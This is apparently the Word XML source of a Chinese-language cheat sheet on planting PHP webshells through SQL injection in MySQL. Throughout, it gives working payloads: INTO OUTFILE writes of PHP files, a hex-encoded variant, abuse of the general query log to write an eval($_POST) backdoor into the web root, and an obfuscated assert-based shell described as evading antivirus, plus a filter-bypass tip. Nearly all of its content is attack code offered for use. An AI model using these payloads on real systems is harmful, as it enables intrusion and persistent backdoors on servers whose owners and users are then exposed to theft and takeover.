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1.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bdr w:val="single" w:color="D6D6D6" w:sz="24" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin where id =-1 union select 1,'&lt;?php phpinfo();?&gt;',3,4 into outfile 'c:\\1.php'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741035" cy="1715770"/>
            <wp:effectExtent l="0" t="0" r="1206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2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="D6D6D6" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="D6D6D6" w:sz="24" w:space="11"/>
          <w:bottom w:val="single" w:color="D6D6D6" w:sz="6" w:space="0"/>
          <w:right w:val="single" w:color="D6D6D6" w:sz="6" w:space="11"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="226" w:afterAutospacing="0" w:line="285" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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bdr w:val="single" w:color="D6D6D6" w:sz="24" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E--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此写法需要查询出数据,才能将shell写入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410200" cy="1837055"/>
            <wp:effectExtent l="0" t="0" r="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3.通过数据库日志写shell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outfile被禁止，或者写入文件被拦截；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在数据库中操作如下：（必须是root权限）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show variables like '%general%';  #查看配置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set global general_log = on;  #开启general log模式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set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址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select '&lt;?php eval($_POST[cmd]);?&gt;'  #写入shell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SQL查询免杀shell的语句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6D6D6" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="D6D6D6" w:sz="24" w:space="11"/>
          <w:bottom w:val="single" w:color="D6D6D6" w:sz="6" w:space="0"/>
          <w:right w:val="single" w:color="D6D6D6" w:sz="6" w:space="11"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="226" w:afterAutospacing="0" w:line="285" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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bdr w:val="single" w:color="D6D6D6" w:sz="24" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT "&lt;?php $p = array('f'=&gt;'a','pffff'=&gt;'s','e'=&gt;'fffff','lfaaaa'=&gt;'r','nnnnn'=&gt;'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?&gt;"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23232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23232"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>4.遇见其他拦截用;过滤后面的语句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93D98"/>
    <w:rsid w:val="4A70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virus</dc:creator>
  <cp:lastModifiedBy>.ｏ°○.•°○•°゜</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-29T04:52:12Z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